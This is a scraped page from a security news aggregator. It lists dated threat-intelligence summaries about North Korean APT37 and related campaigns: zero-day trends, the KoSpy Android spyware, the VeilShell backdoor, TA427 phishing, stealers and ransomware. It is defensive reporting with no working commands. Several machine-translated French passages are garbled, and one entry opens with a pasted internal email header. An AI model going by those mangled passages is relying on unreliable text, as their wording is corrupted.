SEC News

What's new arround internet

Last one

Src	Date (GMT)	Titre	Description	Tags	Stories	Notes
	2025-04-29 05:00:00	Bonjour 0 jours, mon vieil ami: une analyse d'exploitation du 2024 zéro-jour Hello 0-Days, My Old Friend: A 2024 Zero-Day Exploitation Analysis (lien direct)	Écrit par: Casey Charrier, James Sadowski, Clement Lecigne, Vlad Stolyarov Résumé exécutif GoogleThreat Intelligence Group (GTIG) tracked 75 zero-day vulnerabilities exploited in the wild in 2024, a decrease from the number we identified in 2023 (98 vulnerabilities), but still an increase from 2022 (63 vulnerabilities). We divided the reviewed vulnerabilities into two main categories: end-user platforms and products (e.g., mobile devices, operating systems, and browsers) and enterprise-focused technologies, such as security software and appliances. Vendors continue to drive improvements that make some zero-day exploitation harder, demonstrated by both dwindling numbers across multiple categories and reduced observed attacks against previously popular targets. At the same time, commercial surveillance vendors (CSVs) appear to be increasing their operational security practices, potentially leading to decreased attribution and detection. We see zero-day exploitation targeting a greater number and wider variety of enterprise-specific technologies, although these technologies still remain a smaller proportion of overall exploitation when compared to end-user technologies. While the historic focus on the exploitation of popular end-user technologies and their users continues, the shift toward increased targeting of enterprise-focused products will require a wider and more diverse set of vendors to increase proactive security measures in order to reduce future zero-day exploitation attempts. Scope This report describes what Google Threat Intelligence Group (GTIG) knows about zero-day exploitation in 2024. We discuss how targeted vendors and exploited products drive trends that reflect threat actor goals and shifting exploitation approaches, and then closely examine several examples of zero-day exploitation from 2024 that demonstrate how actors use both historic and novel techniques to exploit vulnerabilities in targeted products. The following content leverages original research conducted by GTIG, combined with breach investigation findings and reporting from reliable open sources, though we cannot independently confirm the reports of every source. Research in this space is dynamic and the numbers may adjust due to the ongoing discovery of past incidents through digital forensic investigations. The numbers presented here reflect our best understanding of current data. GTIG defines a zero-day as a vulnerability that was maliciously exploited in the wild before a patch was made publicly available. GTIG acknowledges that the trends observed and discussed in this report are based on detected and disclosed zero-days. Our analysis represents exploitation tracked by GTIG but may not reflect all zero-day exploitation. aside_block Key Takeaways Zero-day exploitation continues to grow gradually. The 75 zero-day vulnerabilities exploited in 2024 follow a pattern that has emerged	Malware Tool Vulnerability Threat Patching Mobile Prediction Cloud Commercial	APT 37	★★
	2025-03-13 19:53:00	Scarcruft de la Corée du Nord déploie des logiciels malveillants kospys, espionnant les utilisateurs d'Android via de fausses applications utilitaires North Korea\\'s ScarCruft Deploys KoSpy Malware, Spying on Android Users via Fake Utility Apps (lien direct)	L'acteur de menace en la Corée du Nord, connu sous le nom de Scarcruft, aurait été à l'origine d'un outil de surveillance Android jamais vu auparavant nommé Kospy ciblant les utilisateurs coréens et anglophones. Lookout, qui a partagé les détails de la campagne de logiciels malveillants, a déclaré que les premières versions remontent à mars 2022. Les échantillons les plus récents ont été signalés en mars 2024. Il n'est pas clair à quel point ces efforts ont réussi. " The North Korea-linked threat actor known as ScarCruft is said to have been behind a never-before-seen Android surveillance tool named KoSpy targeting Korean and English-speaking users. Lookout, which shared details of the malware campaign, said the earliest versions date back to March 2022. The most recent samples were flagged in March 2024. It\'s not clear how successful these efforts were. "	Malware Tool Threat Mobile	APT 37	★★
	2024-11-11 12:45:44	Faits saillants hebdomadaires, 11 novembre 2024 (lien direct)	## Instantané La semaine dernière, le rapport \\\\\\\\\\\\\ \ \ ait le rapport a mis en évidence un paysage à multiples facettes de cybermenaces motivé par diverses tactiques, vecteurs et cibles. L'analyse a souligné l'utilisation persistante du phishing comme vecteur dominant, allant de la lance sophistiquée ciblant les entités sud-coréennes par APT37 à des campagnes à grande échelle en Ukraine par l'UAC-0050. Des groupes avancés de menace persistante (APT) comme Sapphire Sleet, APT-36 et TA866 ont utilisé des méthodes furtives, y compris des logiciels malveillants modulaires et des outils RMM, pour atteindre l'espionnage et le gain financier. Les vulnérabilités d'infrastructures critiques, comme celles des systèmes Synology NAS et Palo Alto, ont en outre souligné les risques pour les dispositifs d'entreprise et de consommation. Les acteurs de la menace, notamment des groupes parrainés par l'État et des cybercriminels, des outils à effet de levier comme les logiciels malveillants de cryptomine, les botnets sophistiqués et les nouveaux rats pour étendre leur contrôle sur les systèmes, tandis que les élections influencent les opérations par des entités russes et iraniennes ont mis en lumière les dimensions géopolitiques des cyber-activités. Dans l'ensemble, la semaine a révélé un paysage de menaces en évolution marqué par des méthodes d'attaque adaptatives ciblant les institutions financières, les agences gouvernementales et les utilisateurs de tous les jours. ## Description 1. [Attaque silencieuse de l'écumeur] (https://sip.security.microsoft.com/intel-explorer/articles/2f001d21): l'unité 42 a suivi un compromis de serveur Web ciblant une organisation multinationale nord-américaine, liée à la campagne silencieuse de la campagne Skimmer Volet données de paiement en ligne. Les attaquants ont utilisé des vulnérabilités de Telerik UI, établi la persistance via des coquilles Web et des données exfiltrées à l'aide d'outils de tunneling. 1. [Bundle Steelfox Crimeware] (https://sip.security.microsoft.com/intel-explorer/articles/0661f634): une nouvelle étendue de paquet de logiciels malveillants via de faux activateurs de logiciels effectue une attaque multi-étages impliquant un theft de données et une cryptominage. Il cible principalement les utilisateurs du monde entier en exploitant les vulnérabilités de Windows pour élever les privilèges et maintenir la persistance. 1. [CloudComptation \\\\\\\\\\\\\\ ’scolatics d’espionnage évolutif] (https://sip.security.microsoft.com/intel-explorer/articles/792a6266): SecureList de Kaspersky a rapporté que CloudComputation (backdoordiplomacy) est passé à l'utilisation du framework QSC, un malware multi-plugine Outil conçu pour l'exécution des modules en mémoire, améliorant la furtivité et la persistance. Les attaques du groupe \\\\\\\\\\\\\ \\\ \ \\\\\\\\\ \ \ \ \ opérations système. 1. [Remcos Rat Phishing Campaign] (https://sip.security.microsoft.com/intel-explorer/articles/d36e3ff1): Fortiguard Labs a découvert une campagne de phishing déploiement des rat remcos via des documents Ole Excel ole excel qui exploitent les vulnérabilités de Microsoft. Cette attaque tire parti des techniques d'anti-analyse, de la livraison de charge utile sans fil et de la manipulation du système pour la persistance, permettant aux attaquants de contrôler les appareils de victime, de collecter des données et de communiquer avec un serveur de commandement et de contrôle à l'aide de canaux cryptés. 1. [Wish Stealer Malware] (https://sip.security.microsoft.com/intel-explorer/articles/a11d08f6): Cyfirma a découvert un voleur d'informations Windows ciblant la discorde, les navigateurs Web et les portefeuilles de crypto-monnaie. Il utilise le détournement de presse-papiers, les fonctionnalités anti-détection et la discorde pour l'exfiltration des données, posant des risques à la sécurité des utilisateurs. 1. [Apt37 ciblant la Corée du Sud] (https://sip.security.microsoft.com/in	Ransomware Malware Tool Vulnerability Threat Mobile Cloud	APT 37	★★★
	2024-10-21 11:41:26	Faits saillants hebdomadaires OSINT, 21 octobre 2024 Weekly OSINT Highlights, 21 October 2024 (lien direct)	## Instantané La semaine dernière, les rapports OSINT de \\ mettent en évidence une gamme diversifiée de cybermenaces et d'évolution des vecteurs d'attaque.L'ingénierie sociale reste une tactique répandue, avec des campagnes telles que ClickFix tirant parti de faux messages d'erreur pour distribuer des logiciels malveillants, tandis que la campagne d'interview contagieuse CL-Sta-240 cible les demandeurs d'emploi en utilisant des logiciels malveillants déguisés en applications d'appel vidéo.Les voleurs d'informations, tels que Lumma et Meduza, continuent de proliférer et de tirer parti des plates-formes distribuées comme Telegram et Github.Les acteurs de ransomware exploitent les services cloud, comme le montre la campagne Ransomware abusant Amazon S3.Des groupes de l'État-nation, dont la Corée du Nord, l'Iran et la Chine, persistent à cibler des infrastructures critiques et des entités gouvernementales utilisant des techniques d'évasion sophistiquées et des outils open source, tandis que les acteurs motivés financièrement se concentrent sur les chevaux de Troie bancaires et le vol de crypto-monnaie.Ces tendances soulignent la sophistication et la diversité croissantes des acteurs de la menace \\ 'tactiques, à la fois avec les APT de l'État-nation et les cybercriminels ciblant un large éventail de secteurs. ## Description 1. [ClickFix Social Engineering Tactic] (https://sip.security.microsoft.com/intel-explorer/articles/6d79c4e3): Les chercheurs de Sekoia ont identifié Clickfix, une nouvelle tactique d'ingénierie sociale tirant parti de faux messages d'erreur de navigateur pour exécuter Male PowerShell malveillantCommandes.Il a été utilisé par des groupes comme l'Empire national slave et Scamquerteo pour distribuer des infostelleurs, des rats et des botnets ciblant la crypto-monnaie et les utilisateurs de Web3. 2. [Lumma Stealer Distribution via Hijackloader] (https://sip.security.microsoft.com/intel-explorer/articles/ef6514e6): les chercheurs de HarfangLab ont observé une augmentation de la distribution de voleur Lumma en utilisant Hijackloader avec des certificats de signature de code pour les défenses de bypass Lumma.Ces campagnes ont ciblé les utilisateurs à travers de fausses pages CAPTCHA, conduisant à une exécution de logiciels malveillants avec des certificats signés de sociétés légitimes. 3. [Meduza Stealer Spread via Telegram] (https://sip.security.microsoft.com/intel-explorer/articles/ac988484): CERT-UA a rapporté le voleur de Meduza distribué par des messages télégramme, exhortant les utilisateurs à télécharger "Special Special.logiciel."Les logiciels malveillants ont ciblé les entreprises ukrainiennes et volé des documents avant l'auto-délétion pour éviter la détection. 4. [Ransomware exploitant Amazon S3] (https://sip.security.microsoft.com/intel-explorer/articles/f5477a4): TrendMicro a identifié une campagne de ransomware exploitant la fonction d'accélération d'Amazon S3 \\ S pour l'expiltration de données.Déguisé en Lockbit, ce ransomware cible Windows et MacOS, en utilisant des informations d'identification AWS pour les téléchargements de données tout en tirant parti des techniques de chiffrement aux victimes de pression. 5. [AI abusité dans les opérations cyber] (https://sip.security.microsoft.com/intel-explorer/articles/e46070dd): OpenAI a rapporté plus de 20 cas d'utilisation abusive de l'IA par des acteurs malveillants pour le développement de logiciels malveillants, la désinformation et la lancePhishing.Les acteurs de la menace, dont Storm-0817 et SweetSpecter, ont exploité l'IA pour des tâches telles que la reconnaissance et le débogage du code, tandis que les IOS secrets ont été retracés en Iran et au Rwanda. 6. [Variants de trojan bancaires Trickmo] (https://sip.security.microsoft.com/intel-explorer/articles/1f1ea18b): les chercheurs de zimpérium ont découvert 40 variantes de tro-bancs Trickmo capables de l'interception OTP, de l'enregistrement de l'écran et de dispositif de dispositif de dispos	Ransomware Malware Tool Vulnerability Threat Cloud	APT 38 APT 37 APT-C-17	★★
	2024-10-07 16:54:11	Faits saillants hebdomadaires OSINT, 7 octobre 2024 Weekly OSINT Highlights, 7 October 2024 (lien direct)	## Snapshot Last week\'s OSINT reporting highlights diverse and sophisticated attack tactics, primarily focusing on nation-state actors, cybercriminal groups, and advanced malware campaigns. Common attack vectors include spear-phishing, exploiting vulnerabilities (such as CVEs in Linux servers and AI infrastructure), and malware delivered through fileless methods. The malware ranges from Joker\'s subscription fraud (targeting mobile devices) to more complex backdoors like WarmCookie, which allows system profiling and further malware deployment. North Korean APT groups (APT37 and Stonefly) remain active, targeting Southeast Asia and United States companies, while Iranian actors focus on political campaigns. Financially motivated attacks are also prominent, with ransomware groups like Meow and attackers using MedusaLocker deploying advanced techniques for exfiltration and encryption. Cloud environments and AI infrastructure, including generative models like AWS Bedrock, have emerged as critical targets, exposing new vulnerabilities for resource hijacking and illicit services. ## Description 1. [Golden Chickens\' More_Eggs](https://sip.security.microsoft.com/intel-explorer/articles/4cb94d70): Trend Micro discovered the use of the more\_eggs backdoor in spear-phishing attacks, targeting various industries. Recent campaigns involved advanced social engineering, and while attribution remains unclear, there are possible ties to FIN6 (Storm-0538). 2. [Linux Malware Campaign](https://sip.security.microsoft.com/intel-explorer/articles/68e49ad7): Elastic Security Labs uncovered a Linux malware campaign using KAIJI for DDoS attacks and RUDEDEVIL for cryptocurrency mining. The attackers exploited Apache2 vulnerabilities and used Telegram bots for communication and persistence. 3. [Rhadamanthys Malware Updates](https://sip.security.microsoft.com/intel-explorer/articles/c9ea8588): Recorded Future reported on the evolving Rhadamanthys information-stealing malware, now incorporating AI-driven OCR for cryptocurrency theft. It targets systems in North and South America, leveraging encryption and advanced defense evasion techniques. 4. [NVIDIA Container Toolkit Vulnerability](https://sip.security.microsoft.com/intel-explorer/articles/a35e980e): Wiz Research discovered a critical vulnerability (CVE-2024-0132) in the NVIDIA Container Toolkit, exposing cloud and AI environments to container escape attacks. This flaw could lead to unauthorized control over host systems and data exfiltration. 5. [K4Spreader and PwnRig Campaign](https://sip.security.microsoft.com/intel-explorer/articles/416b07c0): Sekoia TDR linked a campaign exploiting WebLogic vulnerabilities to the 8220 Gang, deploying the K4Spreader malware and PwnRig cryptominer. The attackers primarily target cloud environments for Monero mining, exploiting both Linux and Windows systems. 6. [Nitrogen Malware Incident](https://sip.security.microsoft.com/intel-explorer/articles/d0473059): The DFIR Report analyzed an attack using Nitrogen malware delivered through a malicious Advanced IP Scanner installer. The threat actor used Sliver and Cobalt Strike beacons, eventually deploying BlackCat ransomware across the victim\'s network. 7. [Gorilla Botnet\'s DDoS Attacks](https://sip.security.microsoft.com/intel-explorer/articles/0bcef023): NSFOCUS identified the Gorilla Botnet, a Mirai variant, launching over 300,000 DDoS attacks. Its primary targets were U.S., Chinese, and global sectors, including government and telecom, using advanced encryption techniques for stealth. 8. [Iranian IRGC Cyber Activity](https://sip.security.microsoft.com/intel-explorer/articles/42850d7b): The FBI and UK\'s NCSC warned about Iranian IRGC-affiliated actors targeting individuals related to Middle Eastern affairs. Using social engineering, they focused on stealing credentials and influencing U.S. political campaigns. 9. [Critical Infrastructure Reconnaissance](https://sip.security.microsoft.com/intel-explorer/articles/d491ff08): Dragos detected a campaign targeting North Ame	Ransomware Malware Tool Vulnerability Threat Mobile Prediction Cloud	APT 37 APT 45	★★
	2024-10-03 20:13:46	Enveloppe # Sleep: une plongée profonde dans la campagne en cours de la Corée du Nord contre l'Asie du Sud-Est SHROUDED#SLEEP: A Deep Dive into North Korea\\'s Ongoing Campaign Against Southeast Asia (lien direct)	#### Géolocations ciblées - Cambodge - Asie du Sud-Est ## Instantané L'équipe de recherche sur les menaces de Securonix a identifié une cyber campagne en cours, surnommée # enveloppe # Sleep, qui semble être réalisée par le groupe de menaces nord-coréen, APT37. ## Description Cette campagne vise des pays d'Asie du Sud-Est, avec un accent principal sur le Cambodge.Les attaquants utilisent des techniques d'évasion avancées pour fournir Veilshell, un malware furtif basé sur PowerShell.L'infection initiale est obtenue par des e-mails de phishing contenant des fichiers zip avec des pièces jointes malveillantes (.lnk) déguisées en documents légitimes. Une fois le raccourci cliqué, il déclenche un script PowerShell qui extrait et décode plusieurs charges utiles, y compris un fichier DLL malveillant (DomainManager.dll), qui est placé dans le dossier de démarrage pour assurer la persistance.Le logiciel malveillant ne s'exécute pas avant le prochain redémarrage du système, ajoutant à sa nature furtive.Les attaquants utilisent également des techniques telles que AppDomainManager détournant pour maintenir la persistance et utiliser des méthodes sans fil pour éviter la détection par des outils de sécurité. Le Veilshell Backdoor accorde aux attaquants un contrôle complet sur les machines infectées, permettant des actions telles que l'exfiltration des fichiers, les modifications du registre et la création de tâches planifiée.Cette opération sophistiquée est remarquable pour son approche méthodique, y compris de longs temps de sommeil pour échapper aux détections heuristiques, et son utilisation de processus Windows légitimes pour exécuter des commandes. ## Analyse supplémentaire [APT37] (https://attack.mitre.org/groups/g0067/) est un acteur avancé de menace persistant parrainé par l'État nordvictimes principalement en Corée du Sud, mais aussi dans d'autres pays intéressés par la Corée du Nord.According to [Mandiant](https://cloud.google.com/blog/topics/threat-intelligence/mapping-dprk-groups-to-government/), APT37\'s primary goal is likely ingelligence gathering in support ofLes intérêts militaires, politiques et économiques nord-coréens et le groupe peuvent être alignés sur le ministère de la Sécurité des États de la Corée du Nord (MSS). L'APT37 a été observé à l'aide d'exploits zéro jour et d'attaques de phisces de lance en collaboration avec une variété de logiciels malveillants différents, y compris [Dolphin] (https://www.welivesecurity.com/2022/11/30/whos-swinking-south-korean-Waters-Met-Scarcrufts-Dolphin /), [Chinotto] (https://www.zscaler.com/blogs/security-research/unintinal-leak-glimpse-attack- vectors-apt37), [Rokrat] (https://research.checkpoint.com/2023/chain-reaconde-rokrats-missing-link/), [Goldbackdoor] (https://otx.alienvault.com/pulse/626fd3461d762068c921f7c0), et [m2rat] (https: //asec.ahnlab.com/ko/47622/), entre autres. ### Microsoft Defender Antivirus Microsoft Defender Antivirus détecte les composants de menace comme le FOLlowing malware: - [Trojan: win32 / znyonm] (https://www.microsoft.com/en-us/wdsi/therets/malware-encycopedia-dercription?name=worm:win32/znyonm) - [Trojan: Win32 / Leonem] (https://www.microsoft.com/en-us/wdsi/therets/malware-encycopedia-dercription?name=trojan:win32/leonem) - [Trojan: MSIL / Malgent! MSR] (https://www.microsoft.com/en-us/wdsi/therets/malware-encycopedia-description?name=trojan:mil/malgent!msr) - [Trojandownloader: Msil / small] (https://www.microsoft.com/en-us/wdsi/therets/malware-encycopedia-description? name = trojandownloader: MSIL / small) ## références [Enveloppe # Sleep: une plongée profonde dans la campagne en cours de la Corée du Nord contre l'Asie du Sud-Est] (https://www.securonix.com/blog/shroudededsleep-a-deep-dive-into-north-koreas-ongoing-Campagne-Against-Southeast-Asia /).Securonix (consulté en 2024-10-03) ## Copyright &copie;Microsoft 2024 .Tous droits réservés	Malware Tool Vulnerability Threat Cloud	APT 37	★★★
	2024-07-25 14:00:00	APT45: Machine militaire numérique de la Corée du Nord APT45: North Korea\\'s Digital Military Machine (lien direct)	Written by: Taylor Long, Jeff Johnson, Alice Revelli, Fred Plan, Michael Barnhart Executive Summary APT45 is a long-running, moderately sophisticated North Korean cyber operator that has carried out espionage campaigns as early as 2009. APT45 has gradually expanded into financially-motivated operations, and the group\'s suspected development and deployment of ransomware sets it apart from other North Korean operators. APT45 and activity clusters suspected of being linked to the group are strongly associated with a distinct genealogy of malware families separate from peer North Korean operators like TEMP.Hermit and APT43. Among the groups assessed to operate from the Democratic People\'s Republic of Korea (DPRK), APT45 has been the most frequently observed targeting critical infrastructure. Overview Mandiant assesses with high confidence that APT45 is a moderately sophisticated cyber operator that supports the interests of the DPRK. Since at least 2009, APT45 has carried out a range of cyber operations aligned with the shifting geopolitical interests of the North Korean state. Although the group\'s earliest observed activities consisted of espionage campaigns against government agencies and defense industries, APT45 has expanded its remit to financially-motivated operations, including targeting of the financial vertical; we also assess with moderate confidence that APT45 has engaged in the development of ransomware. Additionally, while multiple DPRK-nexus groups focused on healthcare and pharmaceuticals during the initial stages of the COVID-19 pandemic, APT45 has continued to target this vertical longer than other groups, suggesting an ongoing mandate to collect related information. Separately, the group has conducted operations against nuclear-related entities, underscoring its role in supporting DPRK priorities. Shifts in Targeting and Expanding Operations Similar to other cyber threat activity attributed to North Korea-nexus groups, shifts in APT45 operations have reflected the DPRK\'s changing priorities. Malware samples indicate the group was active as early as 2009, although an observed focus on government agencies and the defense industry was observed beginning in 2017. Identified activity in 2019 aligned with Pyongyang\'s continued interest in nuclear issues and energy. Although it is not clear if financially-motivated operations are a focus of APT45\'s current mandate, the group is distinct from other North Korean operators in its suspected interest in ransomware. Given available information, it is possible that APT45 is carrying out financially-motivated cybercrime not only in support of its own operations but to generate funds for other North Korean state priorities. Financial Sector Like other North Korea	Ransomware Malware Tool Threat Medical	APT 37 APT 43	★★★★★
	2024-05-29 13:00:09	Corée du Nord pour construire des réserves de trésorerie utilisant des ransomwares, jeux vidéo North Korea building cash reserves using ransomware, video games (lien direct)	Microsoft dit que l'hermite de Kim \\ pivote les derniers outils à mesure qu'il évolue dans le cyberespace un tout nouveau groupe de cybercriminalité que Microsoft lie avec la Corée du Nord trompe des cibles en utilisant de fausses opportunités d'emploi à lancermalware et ransomware, le tout pour un gain financier… Microsoft says Kim\'s hermit nation is pivoting to latest tools as it evolves in cyberspace A brand-new cybercrime group that Microsoft ties to North Korea is tricking targets using fake job opportunities to launch malware and ransomware, all for financial gain.…	Ransomware Malware Tool	APT 37	★★
	2024-04-16 06:00:54	De l'ingénierie sociale aux abus DMARC: Ta427 \\'s Art of Information Gathering From Social Engineering to DMARC Abuse: TA427\\'s Art of Information Gathering (lien direct)	Key takeaways  TA427 regularly engages in benign conversation starter campaigns to establish contact with targets for long-term exchanges of information on topics of strategic importance to the North Korean regime. In addition to using specially crafted lure content, TA427 heavily leverages think tank and non-governmental organization-related personas to legitimize its emails and increase the chances that targets will engage with the threat actor. To craftily pose as its chosen personas, TA427 uses a few tactics including DMARC abuse in concert with free email addresses, typosquatting, and private email account spoofing. TA427 has also incorporated web beacons for initial reconnaissance of its targets, establishing basic information like that the email account is active. Overview  Proofpoint researchers track numerous state-sponsored and state-aligned threat actors. TA427 (also known as Emerald Sleet, APT43, THALLIUM or Kimsuky), a Democratic People\'s Republic of Korea (DPRK or North Korea) aligned group working in support of the Reconnaissance General Bureau, is particularly prolific in email phishing campaigns targeting experts for insight into US and the Republic of Korea (ROK or South Korea) foreign policy. Since 2023, TA427 has directly solicited foreign policy experts for their opinions on nuclear disarmament, US-ROK policies, and sanction topics via benign conversation starting emails. In recent months, Proofpoint researchers have observed (Figure 1) a steady, and at times increasing, stream of this activity. While our researchers have consistently observed TA427 rely on social engineering tactics and regularly rotating its email infrastructure, in December 2023 the threat actor began to abuse lax Domain-based Message Authentication, Reporting and Conformance (DMARC) policies to spoof various personas and, in February 2024, began incorporating web beacons for target profiling. It is this initial engagement, and the tactics successfully leveraged by TA427, which this blog is focused on. Figure 1. Volume of TA427 phishing campaigns observed between January 2023 and March 2024. Social engineering TA427 is a savvy social engineering expert whose campaigns are likely in support of North Korea\'s strategic intelligence collection efforts on US and ROK foreign policy initiatives. Based on the targets identified and the information sought, it is believed that TA427\'s goal is to augment North Korean intelligence and inform its foreign policy negotiation tactics (example Figure 2). TA427 is known to engage its targets for extended periods of time through a series of benign conversations to build a rapport with targets that can occur over weeks to months. They do so by constantly rotating which aliases are used to engage with the targets on similar subject matter. Figure 2. Example of TA427 campaign focused on US policy during an election year. Using timely, relevant lure content (as seen in Figure 3) customized for each victim, and often spoofing individuals in the DPRK research space with whom the victim is familiar to encourage engagement, targets are often requested to share their thoughts on these topics via email or a formal research paper or article. Malware or credential harvesting are never directly sent to the targets without an exchange of multiple messages, and based on Proofpoint visibility, rarely utilized by the threat actor. It is possible that TA427 can fulfill its intelligence requirements by directly asking targets for their opinions or analysis rather than from an infection. Additionally, insight gained from the correspondence is likely used to improve targeting of the victim organization and establish rapport for later questions and engagement. Figure 3. Timeline of real-world events based on international press reporting, side-by-side with Proofpoint observed subject lures. Lure content often includes invitations to attend events about North Korean policies regarding international affairs, questions regarding topics such as how deterr	Malware Tool Threat Conference	APT 37 APT 43	★★
	2023-05-09 20:02:00	Anomali Cyber Watch: l'environnement virtuel personnalisé cache Fluorshe Anomali Cyber Watch: Custom Virtual Environment Hides FluHorse, BabyShark Evolved into ReconShark, Fleckpe-Infected Apps Add Expensive Subscriptions (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Defense evasion, Infostealers, North Korea, Spearphishing, and Typosquatting. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Deconstructing Amadey’s Latest Multi-Stage Attack and Malware Distribution (published: May 5, 2023) McAfee researchers have detected a multi-stage attack that starts with a trojanized wextract.exe, Windows executable used to extract files from a cabinet (CAB) file. It was used to deliver the AgentTesla, Amadey botnet, LockBit ransomware, Redline Stealer, and other malicious binaries. To avoid detection, the attackers use obfuscation and disable Windows Defender through the registry thus stopping users from turning it back on through the Defender settings. Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioral analysis defenses and social engineering training. Users should report suspicious files with double extensions such as .EXE.MUI. Indicators associated with this campaign are available in the Anomali platform and users are advised to block these on their infrastructure. MITRE ATT&CK: [MITRE ATT&CK] T1562.001: Disable or Modify Tools \| [MITRE ATT&CK] T1555 - Credentials From Password Stores \| [MITRE ATT&CK] T1486: Data Encrypted for Impact \| [MITRE ATT&CK] T1027 - Obfuscated Files Or Information Tags: malware:Amadey, malware-type:Botnet, malware:RedLine, malware:AgentTesla, malware-type:Infostealer, malware:LockBit, malware-type:Ransomware, abused:Wextract.exe, file-type:CAB, file-type:EXE, file-type:MUI, target-program:Windows Defender, target-system:Windows Eastern Asian Android Assault – FluHorse (published: May 4, 2023) Active since May 2022, a newly-detected Android stealer dubbed FluHorse spreads mimicking popular apps or as a fake dating application. According to Check Point researchers, FluHorse was targeting East Asia (Taiwan and Vietnam) while remaining undetected for months. This stealthiness is achieved by sticking to minimal functions while also relying on a custom virtual machine that comes with the Flutter user interface software development kit. FluHorse is being distributed via emails that prompt the recipient to install the app and once installed, it asks for the user’s credit card or banking data. If a second factor authentication is needed to commit banking fraud, FluHorse tells the user to wait for 10-15 minutes while intercepting codes by installing a listener for all incoming SMS messages. Analyst Comment: FluHorse\'s ability to remain undetected for months makes it a dangerous threat. Users should avoid installing applications following download links received via email or other messaging. Verify the app authenticity on the official com	Malware Tool Threat	APT 37 APT 43	★★★
	2023-05-01 23:16:00	Anomali Cyber Watch: APT37 adopte les fichiers LNK, Charming Kitten utilise le bordereau d'implant Bellaciao, le cryptage de remappage d'octet unique Vipersoftx InfostEaler Anomali Cyber Watch: APT37 Adopts LNK Files, Charming Kitten Uses BellaCiao Implant-Dropper, ViperSoftX Infostealer Unique Byte Remapping Encryption (lien direct)	Les diverses histoires de l'intelligence des menaces dans cette itération de l'anomali cyber watch discutent les sujets suivants: apt, Remapping, Cloud C2s, Infostalers, Iran, Corée du Nord, Rats, et vulnérabilités .Les CIO liés à ces histoires sont attachés à Anomali Cyber Watch et peuvent être utilisés pour vérifier vos journaux pour une activité malveillante potentielle. Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces Réaction en chaîne: Rokrat & rsquo; s.Lien manquant (Publié: 1er mai 2023) Depuis 2022, le groupe parrainé par le Nord-Korea APT37 (Group123, Ricochet Chollima) a principalement changé ses méthodes de livraison de Maldocs pour cacher des charges utiles à l'intérieur des fichiers LNK surdimensionnés.Vérifier les chercheurs a identifié plusieurs chaînes d'infection utilisées par le groupe de juillet 2022 à avril 2023. Celles-ci ont été utilisées pour livrer l'un des outils personnalisés de l'APT37 (Goldbackdoor et Rokrat), ou le malware de marchandises Amadey.Tous les leurres étudiés semblent cibler des personnes coréennes avec des sujets liés à la Corée du Sud. Commentaire de l'analyste: Le passage aux chaînes d'infection basées sur LNK permet à APT37 de l'interaction utilisateur moins requise car la chaîne peut être déclenchée par un simple double clic.Le groupe continue l'utilisation de Rokrat bien triés qui reste un outil furtif avec ses couches supplémentaires de cryptage, le cloud C2 et l'exécution en mémoire.Les indicateurs associés à cette campagne sont disponibles dans la plate-forme Anomali et il est conseillé aux clients de les bloquerleur infrastructure. mitre att & amp; ck: [mitre att & amp; ck] t1059.001: Powershell \| [mitre att & amp; ck] t1055 - injection de processus \| [mitre att & amp; ck] t1027 - fichiers ou informations obscurcis \| [mitre att & amp; ck] t1105 - transfert d'outils d'entrée \| [mitre att & amp; ck] t1204.002 - Exécution des utilisateurs: fichier malveillant \| [mitre att & amp; ck] t1059.005 - commande et script interprète: visuel basique \| [mitre att & amp; ck] t1140 - désobfuscate / décode ou informations \| [mitre att & amp; ck] T1218.011 - Exécution par proxy binaire signée: Rundll32 Tags: malware: Rokrat, mitre-software-id: s0240, malware-Type: Rat, acteur: Groupe123, mitre-groupe: APT37, acteur: Ricochet Chollima, Country source: Corée du Nord, Country source: KP, Cible-Country: Corée du Sud, Cible-Country: KR, Type de fichier: Zip, déposer-Type: Doc, Fichier-Type: ISO, Fichier-Type: LNK, File-Type: Bat, File-Type: EXE, Fichier-Type: VBS, malware: Amadey,MALWARE: Goldbackdoor, Type de logiciels malveillants: porte dérobée, abusée: Pcloud, abusé: Cloud Yandex, abusé: OneDrive, abusé: & # 8203; & # 8203; Processeur de mots Hangul, abusé: themida, système cible: Windows	Ransomware Malware Tool Vulnerability Threat Prediction Cloud	APT 37 APT 37 APT 35	★★
	2023-03-28 21:28:00	Anomali Cyber Watch: Takeover comptable, APT, Banking Trojans, Chine, Cyberespionage, Inde, Malspam, Corée du Nord, Phishing, Skimmers, Ukraine et Vulnérabilités [Anomali Cyber Watch: Account takeover, APT, Banking trojans, China, Cyberespionage, India, Malspam, North Korea, Phishing, Skimmers, Ukraine, and Vulnerabilities] (lien direct)	Aucun Sélectionné Sauter vers le contenu à l'aide d'Anomali Inc Mail avec les lecteurs d'écran Yury 1 sur 52 ACW CONSEIL POLOZOV ACCORDS MAR 27 MAR, 2023, 10: 11 & # 8239; AM (1 jour) pour moi, marketing, recherche Cher Jarom etMarketing, ACW est prêt https://ui.thereatstream.com/tip/6397663 - Yury Polozov \|Analyste de renseignement sur la menace de Sr. \|ATR \|www.anomali.com Téléphone: + 1-347-276-5554 3 pièces jointes et taureau;Scanné par gmail & nbsp; Anomali Cyber Watch: Spies amer sur l'énergie nucléaire chinoise, Kimsuky prend le contrôle de Google pour infecter les appareils Android connectés, les mauvaises cibles magiques occupées des parties de l'Ukraine, et plus encore. Les diverses histoires de l'intelligence des menaces dans cette itération de l'anomali cyber watch discutent des sujets suivants: Takeover, APT, Banking Trojans, China, Cyberspionage, Inde, Malspam, North Corée, Phishing, Skimmers, Ukraine, et vulnérabilités .Les CIO liés à ces histoires sont attachés à Anomali Cyber Watch et peuvent être utilisés pour vérifier vos journaux pour une activité malveillante potentielle. Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces campagne de phishingCible l'industrie chinoise de l'énergie nucléaire (Publié: 24 mars 2023) Actif Depuis 2013, le groupe amer (T-APT-17) est soupçonné d'être parrainé par le gouvernement indien.Des chercheurs Intezer ont découvert une nouvelle campagne amère ciblant les universitaires, le gouvernement et d'autres organisations de l'industrie de l'énergie nucléaire en Chine.Les techniques sont cohérentes avec les campagnes amères observées précédemment.L'intrusion commence par un 